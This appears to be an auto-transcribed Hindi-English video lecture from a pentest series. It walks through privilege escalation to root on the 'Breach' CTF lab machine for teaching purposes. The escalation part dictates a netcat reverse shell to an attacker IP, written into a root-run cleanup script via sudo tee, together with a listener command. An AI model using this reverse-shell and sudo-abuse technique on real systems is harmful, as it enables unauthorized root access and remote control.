Audio Jungle. Hello guys and welcome to final episode of Hands on Hacking Practical Pen Testing series. So इस सीरीज़ में काफ़ी आगे आ चुके हैं हम, राइट. देयर आर लॉट ऑफ एपिसोड्स. इसमें हमने वेब ऐप एनुमरेशन सीखा है, रिकॉग्निसेंस कैसे करते हैं वो सीखा है, हॉरिजॉन्टल प्रिविलेज एस्केलेशन कैसे करते हैं वो सीखा है. नाउ ये ब्रीच मशीन का फाइनल लेक्चर है. इसमें हम जानेंगे हाउ टू गेन रूट एक्सेस टू द सिस्टम, जिसको आप वर्टिकल प्रिविलेज एस्केलेशन के नाम से भी जानते हो, राइट. तो चलिए स्टार्ट करते हैं इस लेक्चर को. लास्ट लेक्चर में हम मिल्टन यूज़र पे स्विच हो गए थे, राइट. एंड हमें पता लगा था कि जो मिल्टन यूज़र है वो रूट नहीं है, ना ही वो सूडो का यूज़ कर सकता है इस सिस्टम पे. तो हमारा काम अभी अटका हुआ है बीच में. लेकिन लास्ट लेक्चर में हमने एक एडमिनिस्ट्रेटर अकाउंट, यानी कि जो एक सिस्टम या सर्विस एडमिन अकाउंट था, किसी पर्टिकुलर सर्विस को मैनेज करने के लिए यूज़ होता है, उससे हम एक यूज़र अकाउंट पे आ गए थे. अब उसका फ़ायदा हमें क्या मिलेगा? उसका फ़ायदा हमें ये मिलेगा कि हम जो मिल्टन यूज़र की डायरेक्टरी है, राइट, उसको हम एलएस कर सकते हैं. एंड यहाँ पे हम देख सकते हैं, यहाँ पे हमें मिला है sumscript.sh, राइट. तो इसको हम कैट करके देख सकते हैं. जैसे कि अगर मैं करता हूँ cat/home, ठीक है, मिल्टन एंड देन sum_script.sh. तो इसके अंदर देयर इज़ नथिंग हेयर. ओके, सो ये स्क्रिप्ट खाली है. तो अब हम क्या करेंगे, स्क्रीन क्लियर कर लेते हैं, एलएस करेंगे. तो हमारा जो एक टूल हमने यूज़ किया था, एक स्क्रिप्ट यूज़ करी थी जिसका नाम था प्रिवी, जो हमारे डैनियल लॉरी ने बनाई है, उसका यहाँ पे एक फ़ोल्डर है एंड उसके अंदर काफ़ी सारी फाइल्स भी मिलेंगी. सो यहाँ पे हम करेंगे cd, हम प्रिवी के अंदर आ गए हैं, राइट. एलएस करेंगे एंड यहाँ पे कुछ टेक्स्ट फाइल्स बनी हैं, cron jobs, mysql, password.txt, pathinfo, shadow file, user info, suid, guid, sysinfo एंड root services. तो अब इन्हीं को हम चेक करते हैं कि प्रिवी ने एक्चुअली अंदर से क्या एनुमरेट किया था, राइट. तो सबसे पहले cron jobs से स्टार्ट करते हैं. cron jobs आपके शेड्यूल्ड टास्क होते हैं बेसिकली. सो CRONJOBS के सेंसिटिव होता है एंड इसके अंदर एज सच अभी तो कुछ अलग या डिफरेंट नज़र नहीं आ रहा है, राइट. तो हमने कैट किया एंड ये दिखा भी रहा है कि ये आपको क्या कमांड रन करके आपको आउटपुट मिला है, राइट, जो प्रिवी ने रन करी थी. तो यहाँ पे हमारी कुछ सर्विसेज हैं, राइट, एंड इनमें से कोई भी अजीब सर्विस नहीं है या ऐसा कुछ जो आपकी आईब्राउ रेस करे. तो ये खाली है, राइट. तो अब हम क्या कर सकते हैं, हम अगेन एलएस करते हैं. देयर इज़ नेटवर्क इन्फो, तो हम नेटवर्क इन्फो को ट्राई करते हैं, क्या पता नेटवर्क के अंदर हमें कुछ मिल जाए. कैट नेटवर्क इन्फो एंड नेटवर्क इन्फो भी इसके अंदर ये नॉर्मल आईपी कन्फिग वाली आपकी रिक्वेस्ट है, राइट, जो इफ़ कन्फिग होता है उसका रिज़ल्ट है, आईपी एडर का रिज़ल्ट है, लोकल होस्ट एंड यहाँ पे एज सच कोई 80 एंड 8443 यूज़ हो रहे हैं, हम जानते हैं. एंड ये हमारा आई गेस नो, दिस इज़ नथिंग रिलेटेड टू अस, हमसे रिलेटेड नहीं है. एंड देयर इज़ नथिंग. ओके, तो ये भी खाली है, यहाँ भी कुछ नहीं है, ठीक है. तो कैट passwd.txt करते हैं. ओके, आई गेस इसका C कैपिटल होगा, P कैपिटल होगा, cd passwd.txt. तो यहाँ से हमें कुछ यूज़र्स के बारे में पता लग रहा है, राइट. हम मिल्टन में हमें यहाँ पता लग गया दैट देयर इज़ अ यूज़र नेम एज बिल लम्बर्ग, ठीक है. बी लम्बर्ग हमें पता है कौन है, बिल लम्बर्ग है. ये हमें लेक्चर 1 और 2 में पता लगा था, तो इसे हम नोट्स में डाल लेंगे, राइट. तो इसको
ऐसे ऐसे सेपरेट कर देंगे। एंड यहाँ पे हम लिखेंगे वी लॉग्ड इन टू मिल्टन्स account with the creds, but it was not in sudoers file and not a root user as well। ठीक है, फिर हम क्या लिखेंगे, we enumerated passwd of the target system, we got to know that there is another user named Bilumberg and Bilumberg, या फिर हम लिखते हैं BERGH यूज़र नेम Bilumberg। ठीक है, तो ये आप अपने हिसाब से कस्टमाइज़ भी कर सकते हैं, छोटा बड़ा वो आपकी मर्ज़ी है। ओके, चलो हमें एक चीज़ यहाँ से पता लग गई कि यहाँ पे Bilumberg नाम का एक यूज़र अकाउंट है। ठीक है, तो हम उसको यूज़र एनुमरेशन के लिए यूज़ कर सकते हैं, राइट। एंड और इसको ईजी बनाने के लिए या फ़िल्टर करने के लिए और हम क्या कर सकते हैं, हम इसको फ़िल्टर कर सकते हैं cat passwd.txt। ठीक है, एंड देन grep, एंड इसके बाद हम करेंगे bash। तो जहाँ भी बैश रिज़ल्ट्स होंगे वो आ जाएंगे। तो बैश के 3 ही रिज़ल्ट्स आ रहे हैं, एक आपका रूट आ रहा है मिल्टन जो हम यूज़ कर रहे हैं, एंड Bilumberg जो इसके बारे में अभी हमने डॉक्यूमेंट करा। ठीक है, ठीक है, तो बिल के पास बैश शेल है, वी नो दैट, राइट, नोट्स में डाल लिया। तो चाहो तो आप इस पूरे रिज़ल्ट को भी नोट्स में डाल सकते हो कि टारगेट अकाउंट के यूज़र अकाउंट्स कौन कौन से हैं। ठीक है, तो अब हम क्या कर सकते हैं, जो हमारा यूज़र है Bilumberg, उसको एज अ यूज़र हम उसकी यूज़र प्रोफाइलिंग कर सकते हैं, राइट। तो हम अगेन क्या करेंगे, cat देन यहाँ पे userinfo.txt को देखते हैं, क्योंकि अब हम यूज़र प्रोफाइलिंग कर रहे हैं तो ऑब्वियसली हमें इसकी ज़रूरत पड़ेगी। एंटर प्रेस करते हैं एंड यहाँ पे कुछ रिज़ल्ट्स हैं। तो ये मिल्टन की डायरेक्टरी है, मिल्टन की डायरेक्टरी में हमने देख लिया सम script.sh MySQL की हिस्ट्री की स्टोर फाइल, एंड Bilumberg या बिल की डायरेक्टरी में एज सच कुछ भी नहीं है। ठीक है, तो ये एम्प्टी है। और हम क्या कर सकते हैं, हम पाथ इन्फो देख सकते हैं, राइट। यहाँ पे पाथ इन्फो नाम का भी एक फ़ाइल था, ये रहा। तो हम कर सकते हैं cat pathinfo.txt, एंड पाथ में कभी कभी होता है कि कोई ऐसी फ़ाइल जो नहीं होनी चाहिए पाथ इन्फो जैसी चीज़ के अंदर वो होती है, राइट। तो पाथ में कुछ भी अनयूजुअल नहीं है। ओके, तो वी कैन नाउ लुक अप फॉर रूट सर्विसेज, बिकॉज हमें रूट चाहिए, तो हो सकता है कि हम किसी सर्विस को एक्सप्लॉइट कर सकें। तो यहाँ पे थोड़ी नहीं काफ़ी सारी सर्विसेज हैं जो एज अ रूट रन कर रही हैं। सो कर्नल मॉड्यूल्स हैं, यहाँ पे बायोस मॉड्यूल है, आपका नेटवर्किंग मॉड्यूल्स हैं, सर्विसेज हैं, एंड नॉट अ गुड थिंग हेयर एज वेल। यहाँ भी कुछ ऐसा नहीं है जो आपकी हेल्प कर सके या बेसिकली लाइक आपको रूट एक्सेस दे सके। तो हम आगे बढ़ेंगे और फाइल्स को एन्यूमरेट करेंगे, राइट। हम अगेन ls करेंगे। नेक्स्ट हम देख सकते हैं क्या देख सकते हैं, देयर आर अ लॉट ऑफ फाइल्स, राइट। तो shadow txt को हम देख सकते हैं, shadow के अंदर हमें पासवर्ड हैशेज मिल सकते हैं, हम पासवर्ड क्रैकिंग कर सकते हैं। तो cat एंड shadow.txt एंड इट इज़ ब्लैंक ऑब्वियसली, क्योंकि उसके लिए रूट परमिशन लगती है, तो एक्सेस डिनाइड रहा होगा। एंड ये काफ़ी अच्छी एक चीज़ रहती है ड्यूरिंग द CTFs, SUID GUID वाली जो भी आपके वर्ल्ड राइटेबल्स होते हैं उनको एक्सप्लॉइट करना काफ़ी आसान होता है। एंड ये तो इम्प्रेस CMS से भरा पड़ा है। एक काम करते हैं, इसको हम फ़िल्टर करते हैं, राइट, grep, एंड देन grep हम डाल देंगे -v एंड देन इम्प्रेस CMS। ओके, गुड। सो यहाँ पे आपका वर्ल्ड
वर्ल्ड राइटेबल्स हैं जिनमें हम राइट कर सकते हैं बेसिकली। तो देर इज़ अ portly.sh, sumscript.sh, देन ये वो हमारी स्टार्टिंग में एपिसोड 1 में जो हमें जिप फाइल्स और जेपीजी इमेज फाइल्स मिली थी वो सब हैं। ओके, सो ये तो हम जानते हैं कि ये खाली है स्क्रिप्ट, इसके अंदर कुछ नहीं है, तो इसका यूज़ करने का कुछ फ़ायदा नहीं है। बट देर इज़ अनदर स्क्रिप्ट एंड दिस इज़ दिस portly.sh। तो इसे हम नोट्स में डाल लेंगे with enumerating world writables we got an interesting file। ठीक है, एंड इसको हम पेस्ट कर देंगे, एंड हमने इसको यहाँ पे पेस्ट कर दिया। ऑलराइट, आगे बढ़ते हैं। सो portly.sh हमारे लिए एक इंटरेस्टिंग चीज़ हो गई है, मिल्टन हम जानते हैं। सो अब हम क्या कर सकते हैं, ब्राउज़र पे आते हैं। तो ये हमने लास्ट सेशन में पासवर्ड क्रैक किया था। एंड देयर इज़ अ साइट GTFO बिन्स। तो GTFO का मतलब क्या होता है मेरे को बताने की ज़रूरत नहीं है। ये एक ऐसी साइट है जहाँ पे लिनक्स बाइनरीज़ का यूज़ करके आप प्रिविलेज एस्केलेशंस कर सकते हो, राइट। तो आपकी कॉमनली यूज़ होने वाली जो बाइनरीज़ हैं वो होती है PKEXCE, राइट, फंक्शन सूडो। इसको देखते हैं, तो सूडो तो हमारे पास है ही नहीं, तो हम इसका यूज़ नहीं कर सकते, राइट। तो बेसिकली हम इसका यूज़ कर सकते हैं। इट इज़ अ रियली गुड इन्फो व्हेन आप एक लिनक्स मशीन पे प्रिविलेज एस्केलेशन करो। वापस अपने टर्मिनल पे आते हैं, तो अगेन एलएस करेंगे एंड हम यहाँ करेंगे कैट एंड देन यहाँ पे सिस्टम इन्फो हम देख सकते हैं, राइट। तो सिस इन्फो कॉपी कर लेंगे, पेस्ट कर देंगे, एंड ये आपकी सिस इन्फो है बेसिकली कर्नल नंबर वगैरह। तो ऐसे में हम क्या कर सकते हैं, जब आपको इन्फो मिलेगी तो आप कर्नल मॉड्यूल के लिए कोई एक्सप्लॉइट ढूंढ सकते हैं अगर वो एक्सप्लॉइटेबल है या नहीं। वापस ब्राउज़र पे आते हैं, दोबारा से वेब एनुमरेशन करेंगे। ऑलराइट, तो ब्रीच आ गई, यहाँ क्लिक किया एंड देन होम पेज पर आ गए। होम पेज अगेन सिंपल है। तो यहाँ पे एक डायरेक्टरी थी आपकी, राइट, इमेजेस करके, तो /images images बिल। ओके, सो एक चीज़ मैं आपको बताना चाहता हूँ, अब जो होने वाला है वो रियल लाइफ सिनेरियो नहीं होता, ये केवल CTF तक आपका लिमिटेड है, ठीक है। तो हम क्या कर सकते हैं, थोड़ी सी स्टेगनोग्राफी परफॉर्म करेंगे। बिल का अकाउंट जो है, जो बिल की फ़ोटो है, तो मैं क्या करूँगा, wget एंड पेस्ट कर दूँगा, एंटर प्रेस करेंगे। एंड देन मैं थोड़ा सा टूल्स यूज़ कर सकता हूँ, जैसे exif टूल एंड build.png। यहाँ पे एक कमेंट लिखा है जो कि अजीब है एंड इंटरेस्टिंग भी है, तो हम इसको कॉपी कर लेते हैं एंड चेक करते हैं कि क्या ये बिल का पासवर्ड हो सकता है। LUMBERGH, पेस्ट, एंटर, एंड वी आर इन, राइट। तो बेसिकली आप यहाँ पे देख सकते हो यूज़र चेंज हो गया है, हम बी लम्बर्ग हैं। अब हम क्या करेंगे, sudo-l, एंड इस पर हमें क्या इन्फो मिल रही है कि यहाँ पे एक आपका बाइनरी है T करके, एंड आपकी एक फाइल है tidyup.sh जिसके अंदर जो एज अ रूट रन कर सकता है बिल लम्बर्ग बिना पासवर्ड के। ओके, सो हम क्या करेंगे, मैनुअल देखते हैं एक बार, अगर मैनुअल है तो man t, so t read from standard input and write to the standard output and files। ओके, सो बेसिकली ये इनपुट आउटपुट के लिए यूज़ होता है। ऑलराइट, ग्रेट, ठीक है। तो अब हम क्या कर सकते हैं, हम इसका यूज़ करेंगे किसी तरीके से so that we can get the root access। सो हम क्या कर सकते हैं, बिल सूडो कर सकता है, राइट। सो लेट्स सी यहाँ नेटकेट है क्या,
या श्योर, तो यहाँ पे नेटकैट इंस्टॉल्ड है। तो हम क्या कर सकते हैं, हम इस फाइल का यूज़ करेंगे जो आपका रन करेगी, राइट। एंड हमने एक लिसनर भी ऑन करना है उसके साथ साथ, ठीक है। सो मैं यहाँ पे एक लिसनर डाल लेता हूँ, NC-NVLP पोर्ट नंबर 8888, ठीक है, 8888। अब मैं क्या करूँगा, हमारी जो नेटकैट का बैकडोर वाला कमांड है उसको मैं लिख दूँगा उस फाइल में, जो आपकी tidyup.sh वाली जो फाइल है उसमें मैं इसको डाल दूँगा, ठीक है, टी का यूज़ करके। तो एको NC-NV192.168.110.128, देन जो पोर्ट नंबर देना है वो -E, ठीक है। देन bin bash, E इज़ फॉर एग्जीक्यूट, कि इसके रन करते ही आपने क्या एग्जीक्यूट करना है, राइट। देन मैं यहाँ पे पाइप करके sudo t एंड usr share आपका clen clean up /tidyup.sh, राइट। तो मैं लिसनर ऑन करना भूल गया था, हम दोबारा से इस चीज़ को रन करते हैं, राइट। पेस्ट कर दिया, ओके, एंड एंटर प्रेस करूँगा अगर, तो ये चीज़ यहाँ पे एग्जीक्यूट होनी चाहिए। लेट्स सी होती है या नहीं। तो कैट स्लैश, ऑलराइट। तो आपका जो हमने यहाँ पे कमांड दी है वो उसके अंदर जा चुकी है, राइट। एंड अब हमें उस फाइल को ट्रिगर करना होगा, ठीक है। तो यहाँ पे अब तक कनेक्शन ऑन नहीं हुआ है, तो अब हम इसको ट्रिगर कैसे कर सकते हैं। वी कैन ट्राई बाय, हम लोकेशन पे जा सकते हैं, राइट। यूएसआर शेयर देन क्लीन अप एंड हेयर वी गो। आप देख सकते हैं यहाँ पे हमें कनेक्शन मिल गया है। मैं अपना टर्मिनल थोड़ा सा साइड दिखा देता हूँ आपको, राइट। ls करेंगे, देर इज़ flare.jpg, pwd करेंगे तो आई एम इन रूट, ls-al, एंड यहाँ पे मेरा flag.txt है जिसे मैं cat कर सकता हूँ, cat flag.txt, एंड दैट्स इट गाइज। सो हमने फाइनली ब्रीच मशीन को रूट कर लिया है, एंड दैट इज़ ऑल फॉर दिस लेक्चर गाइज। बहुत मज़ा आया इस सीरीज़ में, इस पहली मशीन को रूट करने में। ऐसे ही आगे भी दूसरी मशीन्स को रूट करेंगे, दूसरी मशीन्स भी आएंगी। आई होप आपको ये वीडियो पसंद आया होगा, आपको ये सीरीज़ पसंद आई होगी। एंड अगर आपको ये पसंद आया है तो यार चैनल को लाइक करो, शेयर करो, सब्सक्राइब करो, कमेंट करो अगर आपका कोई डाउट है तो। एंड मैं मिलता हूँ आपसे सीरीज़ के एंड नेक्स्ट वीडियोज़ में, ठीक है। तब तक के लिए बाय बाय एंड टेक केयर।